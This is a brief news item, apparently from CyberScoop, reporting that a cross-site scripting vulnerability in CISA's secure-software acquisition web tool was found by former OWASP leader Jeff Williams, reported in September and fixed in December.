CISA’s secure-software buying tool had a simple XSS vulnerability of its own

A Cybersecurity and Infrastructure Security Agency tool dedicated to helping government agencies buy secure software turned out to have a cybersecurity vulnerability of its own.

Jeff Williams, the former leader of the Open Worldwide Application Security Project (OWASP), told CyberScoop that he discovered a cross-site scripting vulnerability in CISA’s “Software Acquisition Guide: Supplier Response Web Tool” and reported it to CISA in September, before it was eventually fixed in December.

The vulnerability involves attackers injecting JavaScript into a web page, then getting that JavaScript to attack other users of that same page, he said. It also could have been used to deface the website, he said.

Read more at CyberScoop